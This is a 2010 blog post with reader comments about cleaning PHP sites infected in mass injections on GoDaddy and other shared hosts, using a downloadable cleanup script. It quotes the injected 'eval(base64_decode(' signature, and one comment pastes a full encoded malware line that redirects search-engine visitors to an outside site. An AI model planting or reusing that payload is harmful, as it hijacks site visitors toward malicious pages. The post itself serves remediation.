Follow BlogTips via RSS Get BlogTips updates via Email Follow @SM4NP - Social Media for NonProfit

Godaddy hacked again. Another way to cure your site.

Posted on May 17th, 2010 by

hacker

Godaddy got hacked again this morning (This is what Godaddy has to say about it). Update: and again on May 20. And again on September 18 and September 21.

If you host your blog on Godaddy, you would do well to check your site regularly for any malware, and here is how.

The hack is the same as the previous 4 hacks, affecting thousands of sites: A oneliner malware code is inserted in every single .php file on your site, starting with:

?php /**/ eval(base64_decode("goobledegoob"))

I described before how to cure it, but here is another, slightly more sophisticated way which first lists the infected files, prompts to continue, deletes the oneliner malware in all of your .php files, and lists the cured files. It is inspired by a script written by Andy Stratton in this post.
Running the script, even for a large site, will only take half a minute.

The script will not only work for Godaddy + WordPress, but for any .PHP based site (I used it this morning to cure a Drupal site) on any host.

The script is also a quick way to find out if your site is actually infected. Just run it as described below. If there are no infected files, it will say so and won’t prompt to cure anything.

Here are the right steps to follow:

  1. Make sure you backup your site, just to make sure. There are many tools to do so, but a “brute force” copy of your entire blog directory to your local computer using an FTP tool like Filezilla, works fine.
  2. ….Lemme double check: you made a backup, right? If you did not, or you do not know how to make one, don’t proceed, and get some help.
  3. Download this zip file. It contains a file called “fixfiles.php”. Extract it and store it on your computer.
    (Ok, no zipfile? Here is the fixfilesphp.txt version. Save it as fixfiles.php)
  4. FTP the “fixfiles.php” file to the root directory of your blog. In GoDaddy, that is the /HTML directory (which also contains index.php, wp-login.php etc..):
    GoDaddy Root Directory

    GoDaddy Root Directory

    If you only want to clean a subdirectory (and its underlying tree), put the file in that the subdirectory, but remember also the command in the next line will have to reflect that.

  5. Then execute the code with the command:

    http://yoursite.com/fixfiles.php

    or

    http://yoursite.com/subdir/fixfiles.php

    if you put the script in a sub directory

  6. The code will first scan for the malware code in your files, in both the directory it is put, and all underlying directories.
    If you get the message:

    0 Infected Files in ./

    …then your site is clean.
    If any malware is found, the script will list the infected files and prompt you to fix them:

    malware found - fix the filesClick on “Fix Files”, Click OK on the prompt to proceed:

    Prompt to fix malware
    The script will scan through all files again, and clean the malware. It will list all files that were cleaned.

    Malware scan finished

  7. Delete the “fixfiles.php” file from your site after execution.
  8. If you are using a caching plug-in, don’t forget to CLEAR YOUR CACHE, otherwise the malware will continue to be served to your users, even though you cleaned your .php code.

All of that is “curing” the problem. I have looked everywhere, but am yet to find a way to “avoid” the infection. It looks like the hackers found a loophole in Linux shared hosts (and not just those on Godaddy) in combination with PHP vulnerabilities, which the hosting companies have been unable to identify and/or close.

Until such time, scan your sites regularly, and cure the problem immediately before your visitors get infected.

Picture courtesy Owning Pink




50 Comments to “Godaddy hacked again. Another way to cure your site.”

  1. Many thanks for this.

    Thankfully I’ve only ever used GoDaddy as a Domain registrar service, and not used their hosting (although I recognize the fact that it’s not just them being infected but that they are a principal target) but this ‘fix’ will be very useful for my readers who have not been so fortunate in their hosting provider decisions.

    Hostgator seem to be doing something right though, as their clients have not so far been effected – but maybe they have yet to be targeted!

    I contacted my hosting provider in Europe who assures me that they are monitoring the situation closely and learning any security lessons that they find might need addressing.

    • Peter says:

      Hi Clive,

      Thanks.. I looked at Hostgator.. Indeed they seem to have been saved from the latest hacks. What was not clear, though, was if their packages include the installation services as Godaddy has where Drupal, WordPress etc.. can be installed by a click of a button.
      I am pretty savvy manipulating Drupal and WP, but am absolutely ignorant at system level, so “auto install” would be a must for me.

      Another question: have you ever tried their auto-migrate services where they take an existing site and domain and migrate it to their hosting service for free?

      thanks,

      Peter

  2. Peter says:

    Sorry, leaving an answer to one of my question: It seems hostgator uses Fantastico to install 3rd party applications…

    So that leaves the question if anyone ever tried their migration services?

    Peter

  3. Jon Marks says:

    Thanks! I used your script to temporarily bring my site back to life. I’m also sick to death of GoDaddy. Slow, unstable and now this. If you fancy a GoDaddy rant …

    http://jonontech.com/2010/05/18/godaddy-godaddy-you-bastards-im-through/

    • Peter says:

      Glad it helped, Jon!
      I am looking for a Godaddy alternative myself… Not too happy about it neither…

      Peter

      • Matthew says:

        I’ve been happy with Media Temple. I had moved all of my sites over there except for the one that got infected (on godaddy). http://thecompleteself.com

        I’m implementing your fix as we speak. If all goes well, you will no longer see a blocked site. next I need to ask Google to recheck the site.

        Thanks,

        matthew

  4. Ted says:

    Thanks for your time and script too. I ran it on two of my gd hosted sites and they were both ok. Would have taken a lot longer to do it manually.

  5. JaykGrey says:

    “(Ok, no zipfile? Here is the fixfilesphp.txt version. Save it as fixfiles.txt)”

    Do you mean “fixfiles.php”?

  6. John Soares says:

    I hope I’ll avoid the attacks now that I’ve left Godaddy and moved all of my WordPress sites to Hostgator.

    My fingers are crossed…

    • Peter says:

      John,

      I am seriously contemplating to move too… Did they do the migration for you, or did you move everything yourself?

      Peter

  7. Hostgator (basically the same as bluehost) are normally helpful with their live chat tech support. A request to enable shell access (required a scan of photo ID) was sorted within an hour.

    However, all my sites were attacked in the same way as listed above, (around May 19th I think) so I don’t think that their security is necessarily better than godaddy’s, using this attack as evidence.

    Finally, I’d recommend using their simplescripts service over fantastico, as WP upgrades are made available more quickly, and is a little more flexible.

  8. Aaron says:

    I ran this test and got this script, am i in the green or is my site infected?

    Warning: opendir(./\_db_backups\) [function.opendir]: failed to open dir: No such file or directory in D:\Hosting\4769296\html\fixfiles.php on line 35
    0 Infected Files in ./

    • Peter says:

      Hi Aaron:

      • Looks like the script could not open the directory “_db_backups” (which is typically where the hosting company puts the backups of your SQL database). Would it be possible the directory was deleted while the script ran? Does that directory exist in, can you see it with FTP? I guess re-running the script gives the same error message, does it? Can it be opened (on my site, the directory has the file protection value 705).
        Apart from this error opening that particular subdirectory, it looks like indeed your site is not infected.
      • If you want to double-check, You can always put the script in a subdirectory, eg \wp_content and run it from there as http://yoursite.com/wp_content/fixfiles.php… Know that then, ONLY that subdirectory (and other directories beneath it) will be checked/cured, and not the whole site.

      P.

  9. emm | dleig'blog says:

    [...] done some temporary fix (which you can find here) that goes through all the files on your system and removes the evil PHP. However, it’s only [...]

  10. [...] it was @BloggerTip on Twitter who pointed me to this potential fix. It is currently 8:43pm ET and I am just now doing a backup of my gspn.tv website before I go [...]

  11. Wendy says:

    They got my site too. A call to Godaddy and they said *I* must have loaded something bad on my site, and they knew NOTHING of it nor were they at fault. They wouldn’t acknowledge any problem after going to my website. This fixed it right up. Thank you so much!!!

    • Peter says:

      You are welcome.

      As a hint: when I have a problem which I suspect to be caused by a problem others might also be experiencing, like GoDaddy hosting, I do a quick Twitter search on that subject. There’s a big chance you’re not the first one, if it is a common problem.
      E.g. a Twitter search on “Godaddy” last night revealed just how massive the hacking was (again).
      With that data at hand, there is no way their support can send you off with a dumb message like they gave you…

      PS: On Twitter, @Godaddy was quick to confirm they were being hacked.

  12. Amanda says:

    I am confused as to what to do. I added the zip to my HTML root directory but how do I do the rest?

    • Peter says:

      Ciao Amanda.

      Please follow the instructions step by step.
      As per instructions:
      - Download the zip file onto your computer.
      - It contains a file called “fixfiles.php”. Extract it and store it on your computer.
      - Save it as fixfiles.php
      - FTP the “fixfiles.php” file to the root directory of your blog.
      - in your browser, type the url “http://www.yoursite.com/fixfiles.php

      Let me know if you still have problems.

      Peter

  13. Godaddy WordPress Sites Hacked – How To Fix ? | Services For Seo says:

    [...] check this post on how to fix [...]

  14. [...] might want to either call them, or try this out. Either way, it works. Of the last few days, something had been happened, at least on my end, with [...]

  15. [...] might want to either call them, or try this out. Either way, it works. Of the last few days, something had been happened, at least on my end, with [...]

  16. SidMizard says:

    Great solution, it works on godaddy

  17. Bravo says:

    you hit me on twitter letting me know how to fix my site

    just got hit AGAIN, and looks like this site did too

    so heads up

  18. BlogTipss says:

    I think GoDaddy is good place to buy and sell domains but most worst place to get hosting service.

  19. Bren FM says:

    Howdy!

    just migrated a site from GoDaddy to Hostgator and this little beasty came along for the ride. Your script is SUPER helpful, ta… but one thing to note – the latest mutation features whacking the php code into the first line but NOT using a line break… so your script has not only stripped out the malicious code but the opening php tag on EVERY php script on my Joomla site. Not getting at you about it, as I appreciate the help… just thought you’d like to know so maybe you could adjust your code!

    • Peter says:

      Hi Bren,

      Sorry for the trouble.. It seems indeed that the newest virus does not leave that empty line.
      Let me see what I can do to adapt the code!

      Would it be possible to email me an infected .php file to test?

      Peter (at) theroadtothehorizon (dot) org

  20. Danny Diaz says:

    Thanks a million for this. I got hit by the same type of thing this weekend on a GoDaddy shared server, though they’re moving to a strategy of embedding a single-line Javascript URL forwarder into the first line of _almost_ every file named, “index.php”. The script provided on this page only needed minor tweaks to detect and remove the current strain of attack, thanks a lot for this.

  21. Dave says:

    Hi, this fix looks great, this is attacking my sites again now, but I’m not been able to remove the code with your fix. What could I change to make it work? I’m on Hostmonster, not Goddady. Thanks! The code I get now is:

    eval(base64_decode(“DQoNCg0KZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwidHdpdHRlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2siKSkgew0KCWlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Jpbmdvc3RhcnQub3NhLnBsLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ==”));

    • Peter says:

      Hi Dave,

      I have answered you via Email.. The problem is that indeed the code signature keeps on changing, so also the “fix” code should be adapted…

  22. Umer says:

    Hi,

    I’ll have to say that your solution is a cure not the prevention.

    I myself am a PHP expert and I have seen the script of fixfiles.php. It only searches for “<?php /**/ eval(base64_decode(" in the beginning of the file and if finds, it lists that as a reported file. But there are so many other kind of malware lines which get inserted at the beginning of the file e.g. "” and iframes also get inserted. This script won’t cure them unless we modify the script a little bit for those conditions as well.

    One can set this file execution using cron job and run it daily so whenever the site gets attacked, fixfiles script will fix that. But again, it will just be a cure not prevention.

    Godaddy is not that cause of it, there are many other sites hosted on other servers like hostgator, bluehost which are facing the same problem.

    A simple solution is to re-upload a fresh copy of your script to the server. But still there are situations where this doesn’t help e.g. if the virus is in the database or in a plugin/extension etc.

    I am working on it to find the permanent cure, will get back once done.

    Thanks,
    Umer

    • Peter says:

      @Umer: I fully agree with you on all accounts. It is a cure. And only a cure for the first batch of mass-infections, which happened about a year ago. Since then the infection “signatures” have changed.. Should be easy to change that in the script. If I would be php-programmer, I’d love to make a script that prompts for the signature.

      True too that this script only cures infected .php files, for base64-signatures. There are many other ways a site can get infected.

      True too, this is curing, and prevention would be better. I covered a couple of those in another post, but none of them is water-tight.
      At the time of the first mass infections, the hackers clearly got in via Godaddy, and got hold of FTP login credentials. Changing the credentials helped many. But the leak did not come from the sites themselves, but from the hosting service (e.g. I never use FTP, only SFTP)…

      If you ever come up with a more flexible way to cure, and a more watertight way to prevent, i’d be happy to write a post about it. (and you would help many people along the way too!)

      best,
      Peter

  23. Chris Raymond says:

    Peter,
    I have tried to upload this to the root directory at my GD WordPress site, via Transmit, and the file never appears, just files that begin with:.pureftpd-upload. followed by a long string of digits. Files that I now cannot delete.

    Is this good news, i.e., GD is preventing me from uploading executable php at root?

    • Peter says:

      [edit: sorry got confused on which blogpost this comment was made... thought it was on the post to avoid malware being uploaded via .jpg files... My mistake... so forget what I wrote below.]

      Chris,
      No, that is not exactly how it works. Some content management systems allow users to upload files e.g. avatars. If a hacker would do that, and know where the file is stored (and hide php code in the uploaded file), and execute it, then he is in.
      So you’d have to mimick a user on your site.

      To simulate it, though, you can transfer the file to your site using FTP, and then execute it from the directory where you uploaded it.

      hope this helps,

      Peter

  24. Dawn says:

    Hi – I tried it – it says 0 files, but I know that I have the base64 hacks in the files. So I’m not sure why it’s saying none… :(

    • Peter says:

      Dawn,

      The cleanup routine is based on the hacking code “signature” from 2 years ago.
      it is looking for any file where the FIRST line starts with:

      < ?php /**/ eval(base64_decode(

      Check the .php files on your server and see which base64 code the hackers have put in your files. IF the hacked files contain a string on the FIRST line of your .PHP file, but it does not match the above search criteria, you need to copy that piece of code and put it into my cleanup routine. Has to be an exact copy.

      If your site is hosted by a commercial hosting provider, it might be good to contact their support and ask them to look at your files, and if possible cure them. As we are now 2 years after the first of these hacks came in, most hosting providers have cleanup scripts now... Might be a safier option for you, as in the mean time, hackers have diversified their hack and now inject other code in other places.

      If your site was hacked through the timthumb backdoor, you will cure it in yet another way (again, your hosting provider should be able to help you)

      Let me know if you need further assistance!

      Peter

      • Danny Diaz says:

        We actually found that if you’ve got multiple base64 signatures in your code, you need to look for an auto-generation script in your code. Our Joomla code was riddled with base64 and javascript redirection code, and we eventually found the auto-generation script that was embedded in our Joomla code to randomly insert the hacked code in-place. It was an impressive piece of code, I should have kept it around, it did char/ascii translation from a huge string that was ascii encoded (and didn’t throw any red flags).

        Good luck.
        -Danny

        • Peter says:

          Glad you were able to cure it, Danny.

          “When it all started”, i mean this code injection on a massive scale, two years ago, it was simple to cure, as it was just one piece of code injected at the first line of the .php file. You cured that, secured your site (if they did not get in through a backdoor of a shared server itself) and you were done.. But now, this type of hacking got more sophisticated. With the Timthumb backdoor, I saw how the hackers’ script had found one old timthumb script, and must have “tagged” it, as in the weeks to come, they tried to inject one file with a bit of code. Once they did that, again, they must have flagged it “that they got in”, they executed that code, which did a whole series of operations on my site. They actually created an entire subsite (in a /subdirectory), which was a PC virus injector (infected anyone who visited that subsite).
          The moment they had that site set up, they sent out a spam email to a massive list of people, directing them to that subsite.

          I got to know about it, as someone went to my actual site, found the “contact me” details and emailed me, warning of the infection. I was able to clean it all up in a few hours, but in the mean time, Google had already banned that subsite as malicious (I admit, they were really quick), and at the same time, secured the email spamming-backdoor from my domain.

          I think the time, us webmasters, can say “Oh it won’t happen to me”, is over. The hacking attempts are on such a massive scale, and play that close on the ball that the moment a vulnerability is discovered, as of the next days, their servers start searching for sites with that vulnerability already.

          Wish us luck, protecting one’s site will only become more and more difficult.

          Peter

  25. KG says:

    I ran the file and now my site doesn’t load at all. It throw this message. Help!

    /** * Front to the WordPress application. This file doesn’t do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define(‘WP_USE_THEMES’, true); /** Loads the WordPress Environment and Template */ require(‘./wp-blog-header.php’); ?>

    • Peter says:

      KG,

      It seems it displays your “index.php” file, in the home directory of your WordPress installation.
      I am not sure why it displays, but check that it literally contains the following: (the part between the “—”, but don’t include the “–”)


      < ?php
      /**
      * Front to the WordPress application. This file doesn't do anything, but loads
      * wp-blog-header.php which does and tells WordPress to load the theme.
      *
      * @package WordPress
      */

      /**
      * Tells WordPress to load the WordPress theme and output it.
      *
      * @var bool
      */
      define('WP_USE_THEMES', true);

      /** Loads the WordPress Environment and Template */
      require('./wp-blog-header.php');
      ?>

      I am afraid that if your index.php got corrupted, more .php files might be corrupted.

      What happened: when you ran the script, did it come up with a number of infected files, before you cure it? What did you see in the infected files.

      Peter

  26. KG says:

    Hey Peter,
    It showed me a long list of corrupted files and hit fix files and then it said zero infected. Now when you go to my site, http://www.sorryforpartyin.com, it’s like it’s parked on dreamhost. Where did my WordPress go? All my files are in FTP still.

    KG

    • Peter says:

      How did the index.php look like, when you compared it to what I attached in the previous comment?

      If all else fails, I suggest you restore the site from the backup you made before the fixing (still infected), and ask Dreamhost support to clean up your files. I think by now, Dreamhost should have become more routine’d with cleaning up these infections.

      The problem is that the hacker’s signature keeps on changing, so it becomes hard to detect unless if the code in the cleanup php file is adapted accordingly.

  27. Paul says:

    Hi Peter,
    I just did exactly the same as KG and got the same problem. It looks like it has removed the <?php tag at the end of the first line which needs to be left where it is, similar problem to Bren FM above. If you changed the code for him I'd be grateful for a copy!
    Thanks
    Paul

  28. GARRS says:

    I noticed I had a certificate problem. I also noticed godaddy, which I had never noticed before. by random click following I wound up at a site of a man named huckabee, a internet business, and go daddy information

    I can clearly say, in north Georgia there is a bonding group called Huckabee. I can NOT however say whether they participate in internet detective work filtering or investigation.

    The only common threads, Im facing some NT based exploits, adware exploits, I have a godaddy certificate I did not purchase, and following godaddy I wound up at a site owned by someone named Huckabee.

Leave a Comment

*